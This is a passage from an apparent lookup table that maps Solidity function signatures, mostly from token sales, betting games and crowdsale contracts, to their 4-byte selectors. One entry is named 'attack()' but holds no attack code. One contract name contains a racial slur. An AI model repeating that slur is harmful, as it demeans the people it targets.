"btcAddrPubKeyUncompr(bytes32,int256,bytes32,int256)": "0xe58d478e", "getBitcoinAddress(bytes32,int256,bytes32,int256)": "0x0f050dce", "validateBSM(string,address,uint8,bytes32,bytes32)": "0x480443b7", "createBSMHash(string)": "0x36dc1dd2", "CFL()": "0x8b3ca352", "VebionX()": "0x717e1418", "MyFairToken()": "0x853d814e", "XRRtoken()": "0x94ab9608", "getReservedDestinationInfo(address)": "0xb9e8574f", "AbxyjoyCoin()": "0xd4bcffe4", "setRelease(uint256)": "0xcfa4f3e8", "getTierWhitelist(uint256)": "0xf6281a9b", "TopToken()": "0x2b47cb17", "TopTokenBase()": "0xecc54067", "ZCrowdsale(uint256,uint256,uint256,address,uint256,uint256)": "0x7e580d30", "endTransfer()": "0x6494cde1", "TrumpFarmer()": "0x2a55c47d", "Mining24(uint256,uint256)": "0x60621984", "Webpuddg()": "0x2d614ad2", "IGI()": "0xfacef32a", "changeBaseValue(uint256,uint256,uint256,uint256)": "0xbcf6b3cd", "stopTransfer()": "0xe7f9e408", "startTransfer()": "0x829c3428", "startEthGet()": "0x14ffbafc", "startFreeGet()": "0x1d3795e8", "finishEthGet()": "0xbc2d10f1", "finishFreeGet()": "0x781c0db4", "changeIncrease(address[],uint256[])": "0xe6b71e45", "Hadescoin(address)": "0xbb221cc8", "getPointer(uint256)": "0xe8854cfd", "getRoundPointer(uint256,uint256)": "0x4ac5dea9", "getRoundNumber(uint256,uint256)": "0xc43e9462", "getRoundBetNumber(uint256,uint256,uint256)": "0xd3511f82", "getRoundBetAmount(uint256,uint256,uint256)": "0xf68009b9", "getRoundBetOrigin(uint256,uint256,uint256)": "0xb24c35e4", "getRoundNumberOfBets(uint256,uint256)": "0xae2c1506", "getGameMinAmountByBet(uint256)": "0x658d3423", "getGameMaxNumberOfBets(uint256)": "0xe7320f9e", "getGameRoundOpen(uint256,uint256)": "0x42207083", "getGameCurrentRoundId(uint256)": "0xceb9a5fd", "numberOfClosedGames()": "0x5202b615", "placeBet(uint256,uint8)": "0x03edf914", "closeRound(uint256)": "0x88e01a98", "createGameRound(uint256)": "0xc1f0e2c3", "openGame(uint256)": "0x00f5544f", "closeGame(uint256)": "0x2d6ef310", "createGame(uint256,uint256,uint256,uint256)": "0xbdaae1e7", "setYearTwoMultiplier(uint256)": "0x3983af00", "setYearOneMultiplier(uint256)": "0x559fd7ee", "setBaseInterest(uint256)": "0x91432155", "COCO()": "0x2027e1d3", "SpeedJump()": "0xe67d5b16", "logHash(uint256)": "0x610cbcc7", "AndxorLogger()": "0x9e03a5d0", "moleculartechnology()": "0xf7b28073", "Robot()": "0x5eb28fb2", "bonusPercent()": "0xbecf3add", "mineCoins(uint256)": "0x4c316f70", "createCoins()": "0x98827d5e", "softCapReached()": "0x2b9edee9", "Bitway()": "0xae7ffadc", "CrypTollBoothToken(uint256,string,uint8,string)": "0x5d8302f2", "MANHATTANPROXY5THST()": "0x7bdf9d56", "EtherXeum()": "0xf68c021b", "watchVideoC(address)": "0x70021705", "watchVideoB(address)": "0x40bb28e8", "watchVideoA(address)": "0xaa7be9a7", "rewardComment(address)": "0x7ca60997", "rewardRetweet(address)": "0xe17cb777", "registerNewUser(address)": "0x7d5224d3", "VCCToken(uint256,string,string)": "0xab17176c", "putHashes(uint256)": "0x413e90e7", "putHash()": "0x13e4b51f", "calcHashes(uint32,uint32)": "0x7ea94985", "addHashes128()": "0xb3470e97", "addHashes(uint256)": "0x380f3087", "playSystem(uint256,address)": "0x26699576", "playRandom(address)": "0x2406e9fa", "betOf(address)": "0x4288d759", "disinvest()": "0xdf1ead82", "investDirect()": "0xc27509cf", "pay(uint256)": "0xc290d691", "payWallet()": "0x9ce962ca", "houseKeeping()": "0xd9fa9335", "hotStore()": "0xbe1eefbf", "coldStore(uint256)": "0xcd88333e", "setBetMax(uint256)": "0x0751076d", "setInvestStart(uint256)": "0xe76ece01", "changeAnimator(address)": "0x40c73d17", "dividendsBlocks()": "0x3de8d340", "betBlockNumberOf(address)": "0x8eecddcf", "betHashOf(address)": "0x904d2248", "betValueOf(address)": "0x3e43b652", "walletBlockOf(address)": "0x785ce7ca", "walletPeriodOf(address)": "0xe73cc2eb", "walletBalanceOf(address)": "0x66ce3bd2", "hashesLength()": "0x70ccd928", "SmartBillions()": "0x113c589f", "commitDividend(address)": "0x06a6c28f", "UBT(uint256,string,uint8,string)": "0xe6d660dc", "_createDivCard(string,address,uint256,uint256)": "0x4fcaadae", "receiveDividends(uint256)": "0xf2c7d331", "getDivCard(uint256)": "0x882a1fa0", "startCardSale()": "0x4183f0b3", "createDivCard(string,uint256,uint256)": "0x7894aafa", "setBankroll(address)": "0xbde8a93e", "finalizeICOOwner()": "0x7fe650b1", "increaseUSDRaised(uint256)": "0x525426fd", "increaseBTCRaised(uint256)": "0x375e88bd", "increaseEthRaised(uint256)": "0x1186560e", "removeFromOwnership(address)": "0x060f400b", "addToOwnership(address)": "0xbed1cfcd", "addToBalances(address,uint256)": "0x218a7667", "changeMaxCapUSD(uint256)": "0xb7645ed4", "totalWeiRaisedDuringICO3()": "0xfb9ded46", "tokenRewardContract()": "0x33caaa43", "ecosystemAllocated()": "0x771d9d05", "returnKVTToOwner()": "0xce2d3fa1", "maximalParticipationAmount()": "0x032c05aa", "tokensPerEthPresale()": "0x72b7094a", "preSaleFirstPrice()": "0xca5c1547", "RLCPerETH()": "0xc33a5bb6", "PRESALE_PERCENTAGE_1()": "0xaa487f49", "saler()": "0x1ffd99f4", "addFee()": "0x2f48f151", "crowdsaleState()": "0xe7bb5233", "summEccles()": "0x93dd9866", "turnOffCanUpdateAmountToTakeAsRake()": "0x79bed048", "advisorFirstLockTime()": "0x07caf9e1", "round6TokensRemaning()": "0x08853525", "houseBalance()": "0x67084eb3", "endEpochTimestamp()": "0x1f3b3148", "lastBlock_f7Hash_uint256()": "0x1b4032f5", "uncleSafeNr()": "0xbac97647", "BUYOUT_PRICE()": "0xc4489110", "REFUND_POLL_DURATION()": "0x08867fc2", "collectedWei()": "0xf637b7da", "organizer3()": "0x70ed1664", "buy10()": "0x0cd9f271", "MIN_TASK_VALUE()": "0x2bc67bde", "bitzToken()": "0xdf8e739d", "defaultPayment()": "0x8c1d01c8", "opMinted()": "0x6f476cbc", "totalParticipationAmount()": "0xade7a3ad", "littAdmins()": "0xda081204", "USD_PURCHASE_AMOUNT_REQUIRING_ID()": "0x558234f0", "ATTR_PERMANENT()": "0xc459b003", "ioxToken()": "0xc8b19fa8", "whitelistAddress()": "0xe5002a05", "pendingNewRound()": "0xdbc27799", "getUnprocessedQueryList()": "0xa41fd917", "kill_switch()": "0xa089feea", "Ticket_Price()": "0x19ceb660", "Rate_Eth()": "0xe0d1ba52", "stageCount()": "0xf33261ac", "feeRate()": "0x978bbdb9", "bettingAllowed()": "0x4c9f166d", "DeviceOwner()": "0xcbf26c0b", "profitOwner()": "0x05b8b29e", "weiRaisedPreICO()": "0x94014dc0", "memoryFactor()": "0xbe4a471c", "_multiSigWallet()": "0x6b50b6b3", "vcxCount()": "0x25402e6c", "foundersTokensLockedPeriod()": "0x5e2dff7a", "CPGPEREGRINE_FTL_SPEED()": "0xbb86d8fe", "backupOwner()": "0x3af8e4ab", "paySize()": "0x09dd7b3e", "getRunInfo()": "0x1c7f98ca", "gunsFundDeposit()": "0x9bd8e081", "signer1_proposal()": "0xc37a6e8d", "groomSignedAt()": "0xb5d3a9c6", "accForBounty()": "0x69837721", "hiddenCapTriggered()": "0xb50ff2b8", "ROLE_NEED_LOCK_UP()": "0xc70a24af", "excess_token()": "0xe02ba030", "withdrawedTeamCounter()": "0xb3699d0b", "RATE1()": "0xccf4b70a", "balancePreSale2()": "0x146ef27d", "fundsKeeper()": "0x01d4fb7c", "getFUTTotalSupply()": "0x56257ae1", "mMultiSigWallet()": "0xf88edaf2", "returnPeriodExpired()": "0x04cb17ad", "lastRefrralsVault_()": "0x86a046d5", "auditTimeoutInBlocks()": "0xde42f045", "maxFixedSupply()": "0xc37981b3", "rateSale()": "0x65855010", "AdmineAdvisorTokens()": "0xf43b7a76", "preSale1()": "0xf5f3e58f", "loserTwo()": "0xd9feb8ce", "initCopper()": "0xfd425dd5", "FOUNDER1_STAKE()": "0xfced5694", "fundingRecipient()": "0x1bb534ba", "INITIAL_TOKENS_PER_ETHER()": "0x1a8fc985", "oneStaIsStb()": "0x0b1414c1", "feecounter()": "0x39a248f3", "campaignEnded()": "0x3bc47fbe", "HARDCAP_TOKENS_ICO()": "0x2e029c65", "delegateContract()": "0x3c2b0725", "preBuyersDispensedTo()": "0x28c6d8e3", "percentageToEthertoteDevelopmentWallet()": "0xa9cbd0a5", "capPreICO()": "0xc71692b6", "maxWeightBonus()": "0x68da480b", "foundersFundMultiplier()": "0x13857c1a", "prevBalance()": "0xfaca7cfa", "teamTwoVolume()": "0x9faf52ee", "totalAtom()": "0x615fa416", "maxEthContribution()": "0xdb37ceec", "timeStep()": "0x1502906d", "phase1Price()": "0x6785744d", "weiRefund()": "0x1b29d70a", "winlose()": "0xca4a3df3", "lastBlock_f6Hash_uint256()": "0x12907e08", "airdropPool()": "0x3cebff9c", "auctionFee()": "0x14525b6b", "ico_promo_reward(address,uint256)": "0x84e60e8b", "ico_distribution(address,uint256)": "0xdf41d979", "Compaq()": "0xd028c246", "removeContributor(address)": "0xb3f3ab5c", "getRefunded(address)": "0x4afd74ff", "getEndDate()": "0xb1356488", "getStartDate()": "0x78f305c6", "newCrowdsale()": "0x6fb9a2b4", "getOverTokens()": "0x1b181e58", "batchReturnUNT(uint256)": "0x38fe48b8", "getContributorUSD(address)": "0x44048aa5", "getContributorETH(address)": "0x530c6868", "getContributorTokens(address)": "0x283557ac", "checkBalanceContract()": "0x7b43adfb", "getEthRaised()": "0x29dacb60", "calculateMaxEthIssued()": "0x626f9e20", "calculateMaxTokensIssued()": "0x6dc8dbd4", "calculateMaxContributionUsd()": "0xb0b315e7", "getUSDRaised()": "0xd13e79ec", "getTotalUSDInTokens()": "0x003705bc", "getTokensIssued()": "0x480c6ca5", "checkCrowdsaleState(uint256)": "0xac0f90e3", "setHardCapToken(uint256)": "0x5ddbc632", "setMinimalContribution(uint256)": "0x120dae83", "setStatusI(address)": "0xd09e3526", "setHold(address)": "0x85efa3aa", "getTokenUSDRate()": "0x4f58d5c9", "setTokenUSDRate(uint256)": "0x31076417", "Crowdsale(address,address,address,uint256,uint256,uint256,uint256,address,uint256)": "0x36738b41", "getWithdrawed(address)": "0x244f4894", "returnETHByOwner()": "0x0045626f", "getBalanceReleased()": "0xc7f8fe65", "changeStage()": "0xc06702dd", "changeStageAndReleaseETH()": "0x14f796ca", "releaseETH(uint256)": "0xf9a075dc", "releaseAllETH()": "0x465105f0", "setInitialBalance(uint256)": "0xf5710cc5", "setObserver(address)": "0x94d9c9c7", "Hold(address,uint256,address,address,address)": "0x9c0ee65b", "UnityToken()": "0x50b926fd", "removeAllowed(address)": "0x6470db2f", "addAllowed(address)": "0xcb8523c6", "allowedAddressesOf(address)": "0x7d00818c", "ConvertQuote(uint256)": "0x4cc3a6b0", "getQuote()": "0x171755b1", "setWatcher(address)": "0x24f48bc5", "stopUpdate()": "0x77bf9776", "startUpdate(uint256)": "0x211b4f54", "ETHPriceProvider(string)": "0x6f1236e1", "notifyWatcher()": "0x64836227", "setOraclizeAddrResolverI(address)": "0xe9a909a2", "setUrl(string)": "0x252498a2", "setUpdateInterval(uint256)": "0x7124c683", "getContributorAmount()": "0x59c634b0", "getContributorByIndex(uint256)": "0x085d1973", "addRNTBContribution(address,uint256)": "0x23a37c09", "getContributionTokens(address)": "0x4c839beb", "getContributionRNTB(address)": "0x6cd522f2", "getContributionUSD(address)": "0xdb7a80f8", "getContributionETH(address)": "0x2785fb98", "addContributor(address,uint256,uint256,uint256,uint256)": "0xe2a376ec", "editContribution(address,uint256,uint256,uint256,uint256)": "0xa95609ca", "addContribution(address,uint256,uint256,uint256,uint256)": "0xb5863ed7", "setCompleted(bool)": "0xf51f4738", "removeContribution(address)": "0xc7286a21", "isActiveContributor(address)": "0x15f84d25", "setPermissionManager(address)": "0x49e4b3e5", "Registry(address)": "0x77ef9581", "isPermitted(address)": "0x3fd8cc4e", "changeStage(uint8)": "0xb9172dec", "setEthPriceProvider(address)": "0xe4e9bcca", "receiveEthPrice(uint256)": "0xa47001a8", "initDistribution(address,address,uint256)": "0x658bc083", "PrinzeToken()": "0x6838e7c5", "upgradeToAndCall(address,bytes)": "0x4f1ef286", "_upgradeTo(address)": "0x34140748", "add_to_withdraw_bounty()": "0x36bee178", "add_to_buy_bounty()": "0x88a89dd0", "setBonusToken(address,uint256,uint256,uint256,address,uint256,uint256,uint256)": "0xff3af97f", "setJackpotToken(address,uint256,uint256,address,uint256,uint256,uint256)": "0x2d19413c", "updateGameSpecifics(uint256,uint256,uint256,uint256)": "0x24ce2562", "walletSend(address,uint256,address)": "0xa824e636", "refundTransfer(address,uint256)": "0xc8d52ee3", "updateFlipAndMDT(address,uint256,address,uint256)": "0x2399f870", "updateMaxMinComparables(uint256,uint256,uint256,uint256)": "0xfe2b6246", "EtherFlip()": "0x176b6742", "ERC20Interface()": "0x1bbc4b83", "disallowTransfers(address[])": "0xbbc8e3cb", "allowTransfers(address[])": "0x136ef18a", "PlayToken()": "0xe8421b94", "POW33()": "0x25fb439c", "CAST()": "0x447fa561", "GITC()": "0x5fa27af0", "loadEthBalances()": "0x8cb3c89f", "executeTransaction(address,uint256,bytes)": "0x3f579f42", "setColdWallet(address)": "0x06087e5b", "removeAccount(uint256,address)": "0xc3d7e350", "removeAccountSearch(address)": "0xdacdbb93", "setLimitEth(uint256)": "0x2e1bbe98", "allAccounts()": "0xcf783d8a", "LindaPresale(uint256,uint256,uint256,uint256,uint256,address,address)": "0x924ca55e", "proposalPassed()": "0x227326b1", "Proposal(string)": "0xce5774c6", "checkBalance()": "0xc71daccb", "Authenticate(address)": "0x76f1dbd4", "setHome(address)": "0x6ef0f37f", "updateProfile(address,bytes)": "0xbc9904ec", "setFoundingTeam(uint256[],address[])": "0x6c74e341", "initializedRatify()": "0x1148d93e", "getArticleItem(uint256,uint256)": "0x37629dda", "amendArticleItem(uint256,uint256,bytes)": "0xec6c32cd", "addArticleItem(uint256,bytes)": "0xfb659c3a", "addArticle(bytes,bool)": "0x4a2ee75f", "ConstitutionalDNA()": "0x05d35816", "getTimestamp()": "0x188ec356", "getAugur()": "0x4e94c829", "onlyInEmergency()": "0x3b048123", "stopInEmergency()": "0x22763ae1", "unregisterContract(bytes32)": "0x0c4a9869", "getContractDetails(bytes32)": "0x185e9969", "registerContract(bytes32,address,address,bytes20,bytes32)": "0x28fbd958", "assertIsWhitelisted(address)": "0x3f08882f", "removeFromWhitelist(address)": "0x8ab1d681", "STQPreICO3(address,address)": "0x71b475d0", "getAdd(uint256)": "0x4322b73b", "getMul(uint256)": "0x5f2f83ba", "GetPoolEntranceFee(string)": "0x1af31d7b", "CheckPoolOwnership(string,address)": "0x1cc72c04", "RemovePoolCoOwner(string,address)": "0xeb5ea1c0", "AddPoolCoOwner(string,address)": "0xbc713f1d", "PayPoolEntranceFee(string)": "0x37f1353f", "ChangePoolName(string,string)": "0xb4bee870", "SetPoolEntryFee(string,uint256)": "0xcd93f6f3", "RemovePoolMember(address,string)": "0xe6d0a37d", "AddPoolMember(address,string)": "0xbb0bcbff", "DeletePool(string)": "0xb9d6257d", "SetPoolCreationFee(uint256)": "0x4daa1208", "MintTokens(int256,address,uint256)": "0xb87ff295", "CreateAPool(string,string)": "0xaa10e8c2", "Matchpool()": "0x8194aff3", "MatchpoolAdministrator()": "0xfbec4769", "testMe()": "0x52415840", "setKycRequirement(address,bool)": "0x27a06733", "isKycRequired(address)": "0x7ee0d91c", "BasicToken(uint256,string,uint256,string)": "0x425e0d3c", "getBets(uint256)": "0x1ccf6955", "getProject(uint256)": "0xf0f3f2c8", "claimProfits()": "0x9df51b89", "updateBalances(uint256)": "0x1209073c", "verify(uint256,bool)": "0x3e7cb0d3", "bet(uint256,bool)": "0x9a6d3aaa", "createProject(string,string,uint256,address)": "0x4457d5f0", "getTokenMinted()": "0x6a1dbf03", "attack()": "0x9e5faafc", "authorizePayment(uint256)": "0x81a03133", "arbitrateCancelCampaign()": "0x8b99b742", "arbitrateApproveMilestone(uint256)": "0xf4387d86", "cancelMilestone(uint256)": "0xf75fdcaa", "requestMilestonePayment(uint256)": "0xbdf6fb56", "rejectMilestone(uint256)": "0xcaaed302", "approveCompletedMilestone(uint256)": "0x658df3f7", "markMilestoneComplete(uint256)": "0xee9a5432", "acceptProposedMilestones(bytes32)": "0x4c2fc8b2", "unproposeMilestones()": "0x21c17ab8", "proposeMilestones(bytes)": "0x67b327fa", "changeRecipient(address)": "0x92c2bcb4", "changeDonor(address)": "0xde2b2cd2", "changeArbitrator(address)": "0xfc548f08", "numberOfMilestones()": "0xc81196da", "MilestoneTracker(address,address,address)": "0x390e4855", "offerBtc(address,uint256,bytes32)": "0xed80577d", "PlutusDex()": "0x2cb8460c", "x(int256,int256)": "0xb93eb763", "x(bool)": "0x903db106", "migrateManual(address,bool)": "0xb5d561bb", "Syndicate()": "0xfaea9129", "clientClaim(uint256,uint64)": "0x36cc17a7", "insureClient(address,address,uint64)": "0x5bb5b917", "getAcceptedOracles()": "0x06e430f6", "verifyClaim(uint64)": "0x7439a3bd", "getClientData(address)": "0xf5da210c", "setLeaf(uint256,bytes32)": "0xc7f423c7", "expand()": "0x1cf28a65", "getLeaf(uint256)": "0x22e91248", "getRoot()": "0x5ca1e165", "Input()": "0x989db511", "unlockTip()": "0x1faf1ed4", "unlockAccount()": "0x11d7b2fe", "getTotalBalance(bytes4)": "0x443f577e", "getCoinBalance(bytes4,bytes32)": "0xef599ba5", "withdrawCoin(bytes4,bytes32,uint256)": "0xbeeb6d87", "sendCoin(bytes4,bytes32,bytes32,uint256)": "0x2b877dfd", "getCoinWallet(bytes4)": "0x15c0251c", "Digixbot(address)": "0x5d79eda7", "sendCoin(bytes32,bytes32,uint256)": "0xd5b2c102", "getUsersContract()": "0xd0f46c0b", "getBalance(bytes32)": "0x8e739461", "depositCoin(bytes32,uint256)": "0x3bc1e0f1", "withdrawCoin(bytes32,uint256)": "0x3632b4d9", "getUserId(address,address)": "0x5705b612", "startIcoMainSale()": "0xb75014c0", "precioether()": "0x898f767b", "reserve2Address()": "0x979260bd", "quarters()": "0xbe986420", "Standard_2()": "0xcfa446ec", "maxPVB()": "0x3367aeb2", "ethealController()": "0x79caf670", "numVotes()": "0xa3bef4d7", "newTokenOwner()": "0xd38bd9f0", "isPriv()": "0x7cbd5444", "evePerEth()": "0x347aba23", "addressFounders4()": "0xc48c68ee", "baseIntCalc()": "0x816c4ad1", "endStage1()": "0x6c042689", "tokenStatus()": "0xa6921956", "newVersionReleased()": "0x0289e966", "allowed()": "0x19e1fca4", "maxWithdraw()": "0xac7a1b5b", "thirdTierDiscountUpperLimitEther()": "0x95c26d93", "versionIndex()": "0xff1d2712", "addressFin()": "0x03d76547", "tokenBonusForForth()": "0x975e001a", "bonuses()": "0x90b6b209", "walletAvatar()": "0x8719715e", "tournamentPaused()": "0xd3446856", "totalContractsAvailable()": "0x9fc23a74", "isLunyrToken()": "0x8cc5cde2", "ratePerEthPhase1()": "0x78809c52", "isDelegateEnable()": "0x5551b6b6", "finalTimestampOfBonusPeriod()": "0x50c4ebc4", "getMilestoneBonus()": "0x3a50ccb7", "lastowner()": "0x9ae21121", "advisorsUnlockedAfterCliff()": "0xe319b0e2", "whitelistPrincipleLockPercentage()": "0x7ec0c39c", "rewardAmount()": "0xf7b2a7be", "getMigrateState()": "0x89596409", "MEW_CROWDSALE_FUND()": "0x3d3f5114", "_crowdSaleSupply()": "0x5980d0d7", "trancheDenominator()": "0xc50bd2e4", "requireWhitelistingBeforeDeposit()": "0x20cb27fb", "t0special()": "0x90e2b94b", "getEthChfPrice()": "0x246a3234", "unsoldUnlockedAt()": "0x7d683b95", "lendFee()": "0x4aea0aec", "TotalDeposited()": "0x27ff1374", "sId()": "0xbed47ed8", "MINING_REWARD()": "0xa8469ce9", "InvestmentsCount()": "0x472ad331", "CLOSE_TIME()": "0xd33d5f3e", "maxTickets()": "0x9b894703", "preferentialRate()": "0x5fbff3e2", "twin_contract()": "0x4a66ddff", "DEVCLASS_MAX_CARGO()": "0x6a7dabb9", "downstream()": "0x359582ca", "ibcDistributed()": "0x256697df", "StageOneDisable()": "0x576d067b", "genesisToken()": "0xfda237f8", "LN2()": "0x02780677", "deathData_f16()": "0x62c7e96c", "tokenParametersSet()": "0x3c1e60a6", "ico_finish()": "0x1ce7d9da", "publicSaleCap()": "0x64826b7a", "Larbaoui()": "0xf6f15ec9", "insChainTokenLedger()": "0xdaef569f", "hasCompleted()": "0x7d65b2f7", "place_holder()": "0xf11d5039", "checkPayLoan()": "0x1f1dc61b", "activeGroups()": "0xd0e4567e", "PRIVATE_SALE_MAX_ETHER()": "0x406c92b5", "RESERVE()": "0x9d2cc436", "getLastWin()": "0x7f5375c1", "currentTask()": "0xf388b046", "secondPeriodSupply()": "0x550d8dca", "completeSupply()": "0xc91c6fa5", "guagua()": "0x096ac348", "myAccount()": "0xb29c62f4", "signalToken()": "0xd06c7b5b", "lastHoldingTax()": "0x54be50a5", "PRESALE_START_TIME()": "0x25102f27", "ATTR_SEEDED()": "0x5ea39624", "logoVote()": "0xeb4fe500", "ROLE_BOUNCER()": "0xd466ab6b", "pendingWeiAmount()": "0x27b44a6c", "generalSaleEndDate()": "0x3763d4b4", "INITIAL_POLL_NONCE()": "0x2173a10f", "eurId()": "0xdec74ae9", "COMMISSION_DIVIDER()": "0xb68035a7", "PROMETHEUS_VOUCHER_PRICE()": "0x0a762b42", "out1Done()": "0x91d5d7d6", "icoAmountBonus1()": "0x61aa19d3", "lockedTokensWallet()": "0x0e13af5d", "minWithdrawalThreshold()": "0x2c92a2bc", "releaseSbtToken()": "0x28df192d", "ico2Sold()": "0x63ee8b88", "aquariumCost()": "0x19775795", "deathFactor_iv()": "0x09f767e0", "oldBalance()": "0x1dc82285", "zcc()": "0x069f74c7", "DevvotePrefundClosed()": "0x17111edb", "ICO_RATE3()": "0xa6fda231", "getAllArtworksByOwner()": "0x5afecaaa", "getArtwork(uint32)": "0x21db2aa0", "hex2dec(uint256)": "0x863a0372", "transferBy(address,uint256)": "0x8582e554", "USDollars()": "0x624c5673", "fghcoin()": "0x5523ec91", "Mani()": "0xde318242", "ownerWithdrawTokens(address,address,uint256)": "0xd0ca4dd7", "hasher(address,bytes32,uint256)": "0x5983ae4e", "buyImplementation(address,bytes32,uint256,uint8,bytes32,bytes32)": "0x76405122", "buyTokens(bytes32,uint256,uint8,bytes32,bytes32)": "0xc072422d", "buyTokensFor(address,bytes32,uint256,uint8,bytes32,bytes32,uint8,bytes32,bytes32)": "0xb1fe3eef", "GershToken()": "0xa41f0069", "WorldCup(string,string,uint256,uint256,string,uint256)": "0x9152f764", "ZarFundsToken()": "0x0fc24c03", "transferToken(address,uint256,address)": "0xf640d508", "sendToken(address,uint256,address)": "0x18248f2a", "sendEther(address,uint256,uint256)": "0xdfa24e8e", "NCMToken(uint256,string,string)": "0x33a4ec8d", "TabTradersToken(address,address)": "0xb9e6ac68", "nothingLib2()": "0x3393b069", "checkRevert2(uint256)": "0x3d8e0f4e", "callLibSet2(uint256)": "0x66e3c230", "callLib2(uint256)": "0x2a4dc687", "nothingLib()": "0xa0dce445", "checkRevert(uint256)": "0xa42aa488", "callLibSet(uint256)": "0xdc7b808e", "callLib(uint256)": "0x52437187", "nothing()": "0x448f30a3", "setPayout(uint256)": "0x44c18aa7", "getPayout()": "0x7d065c93", "RichNiggas()": "0x7f4384a8", "Amal()": "0xe6b1c48d", "getNameOf(address,address)": "0x9344c50f", "withdrawPartialDevelopersCut(uint256)": "0x69ab3404", "withdrawAllDevelopersCut()": "0x8dc401ae", "withdrawPot(string)": "0xc07dc59c", "getNeighbourhoodOf(uint256)": "0xe8f1bd8c", "calculateNumberOfNeighbours(uint256,address,address)": "0x87af74ab", "calculateScoresIfCellIsBought(address,address,uint256)": "0x5df58352", "numberOfCellsOwnedBy(address,address)": "0xae7b6daa", "getRankOnePlayer()": "0xba0a93a8", "numberOfBlocksToStartGame()": "0xe164483f", "isGameStarted()": "0xc315432a", "isGameFinished()": "0xef890cc8", "scoreOf(address,address)": "0x5e1c8f89", "numberOfBlocksToEndLimitationPeriod()": "0x68118e95", "isLimitationPeriodActive()": "0xd77844f6", "getNumberOfBlocksRemainingToWin()": "0xe597a27f", "getCurrentPotSize()": "0xd8da3bc0", "getCellsInfo()": "0xc13051d7", "calculateRanking()": "0xd218e144", "calculatePotCut(uint256)": "0x88e4b6ad", "init(address,uint256,uint256,uint256,address,address,uint256)": "0xb3966dc9", "walletTransfer(address,address,uint256)": "0x5573c582", "moveToken(address)": "0xe88c6a8a", "acceptToken(address)": "0x8cd3f064", "rodToken()": "0xaa91cc61", "releaseWithheldTokens(address,bool)": "0xf1ff4a67", "withheldAmount(address,address)": "0x9539c4de", "BittwattToken(uint256)": "0x41d5e10c", "approveDecrease(address,uint256)": "0x2e43bdfd", "approveIncrease(address,uint256)": "0x124442be", "Telephone()": "0x55d6f3c0", "register(bytes32,string)": "0xcf2d31fb", "contract_name()": "0xd9479692", "contract_version()": "0xb32c65c8", "BlocToken()": "0x405f8006", "LGBT()": "0x36eb3aa9", "calculateTokenBuySimple(uint256)": "0xf49e8135", "calculateTokenBuy(uint256,uint256)": "0x8ebb5aee", "calculateTokenSell(uint256)": "0x93d5825e", "AutomatedExchange()": "0x32fb5833", "Bifrost1Token()": "0xf3c6a223", "validReleasedToken(uint256)": "0x9d815818", "getTokenContract()": "0x28b7bede", "getPassportId(address,address)": "0xc7445c22", "getSELabels()": "0x917640b5", "getLabelType()": "0x76d75952", "getSEScore()": "0x21da94e7", "setScore(string)": "0x7858eb7b", "getTransactionIds()": "0xa2e38b54", "IoexCoin()": "0x09af4b1e", "callback(bytes32)": "0xdf13994e", "OtoniToken()": "0x77bdab19", "vestingRules()": "0x6a7eaf8f", "getVestingStageAttributes(uint8)": "0xbe6b6ba6", "initializeVestingFor(address)": "0x420b5fe0", "AtomicSwapRegistryConstructed()": "0xaf6d0437", "redeem(string,bytes32)": "0x0d97f395", "participate(address,uint256,bytes32,address)": "0x45cd4820", "initiate(address,uint256,bytes32,address)": "0x49babd2a", "PXXToken()": "0xb8aaae7a", "getUserStatus(address)": "0xea0d5dcd", "setUserStatus(address,uint256)": "0xf71cc3a5", "getMessageRequestHash(address,uint256)": "0x8e86d030", "getMessageCommunicationHash(address,uint256)": "0xb0f11234", "getNoOfMsgs(address)": "0xc7ed1e86", "addMessage(address,string,string)": "0xc3685e89", "addReplies(address,address[],string,string)": "0x008c3215", "_forfeitShares(address,uint256)": "0x0ab41690", "_claim(address)": "0x38ed85b0", "transferEntireStake(address)": "0x3b9178f7", "transferShares(address,uint256)": "0x8fcb4e5b", "forfeitShares(uint256)": "0xef2f92ad", "grantAdditionalShares(address,uint256)": "0x22bac568", "setGameHostAddress(address)": "0x6254cf80", "setMythexTokenAddress(address)": "0xdd0b1af5", "setXPTokenAddress(address)": "0x0cd8dd0b", "setCardTokenAddress(address)": "0x0b39f18e", "setEditionPackSize(uint8,uint8)": "0xc3c75e5c", "setEditionPackPriceIncrease(uint8,uint256)": "0x1c3cf5d0", "setEditionPackPrice(uint8,uint256)": "0x2a92bffa", "setEditionMaxSales(uint8,uint256)": "0x141e26a5", "setEditionSales(uint8,uint256)": "0x233a04ec", "removeVIP(address)": "0x095dc5cf", "addVIP(address)": "0x4f7d4951", "transferERC20Tokens(address,address,uint256)": "0xc41c9a61", "setTokenAcceptanceRate(address,uint256)": "0xf5ea25f0", "grantPromoPack(address,uint8)": "0xcd7ecda0", "grantXPTokens(address,uint256)": "0x7ab42bbd", "grantMythexTokens(address,uint256)": "0x4145aa9d", "burnXPTokens(address,uint256)": "0x1474b789", "burnMythexTokens(address,uint256)": "0x8a83d4a0", "_processERC20TokenPackPurchase(uint8,address,address)": "0x9deab49e", "upgradeCardShield(uint256)": "0xb9324db6", "upgradeCardDamage(uint256)": "0x5da99f5e", "buyPackWithERC20Tokens(uint8,address)": "0x6e581673", "buyPack(uint8)": "0x940d72ec", "Mythereum()": "0x3dead9e8", "mintEditionCards(address,uint8,uint8)": "0x755fd25c", "cloneCard(address,uint256)": "0xd0a06fb9", "AICoinToken()": "0xa462f87f", "ADEToken()": "0xa36ffd4d", "changeAirLimitCount(uint256)": "0xa53ec007", "changeAirAmount(uint256)": "0x347ff187", "PennyGrab()": "0x1ad781b4", "get_bounty_count(uint256)": "0x68ab56ca", "buyLCRTokens()": "0xa62ea098", "transferPayable(address,address,uint256)": "0x73d4d500", "transferFromOwner(address,address,uint256)": "0xb8dbf876", "payoutBonusesToHolders()": "0xd779ca24", "payoutPartners()": "0x3098d33a", "addPartner(address)": "0x8bf34237", "LicerioToken()": "0x5e60d438", "TOXBToken()": "0x9007cdf3", "crowdsale(uint256,uint256,uint256)": "0x3400a6dd", "wihtdraw()": "0xc1eb8c89", "RAM_Token()": "0x878377e7", "activeEnd()": "0xa8d84fc3", "changeMinToken(uint256)": "0x19825187", "Certification(string,string,string,string,string,string,string)": "0x45798593", "BTSJToken()": "0xec140a1f", "_collectFee(address,uint256)": "0x0d73a44a", "_validateOrder(uint256,uint256,bytes32,address,uint256,uint256,uint256,uint256)": "0x6194acb6", "settlePut(uint256,uint256,address)": "0x158048a0", "exercisePut(uint256,uint256,uint256)": "0x82518c2a", "_sptc(uint256,uint256,uint256,uint256,address)": "0x83e48d43", "_spto(uint256,uint256,uint256,uint256,address)": "0x129932d5", 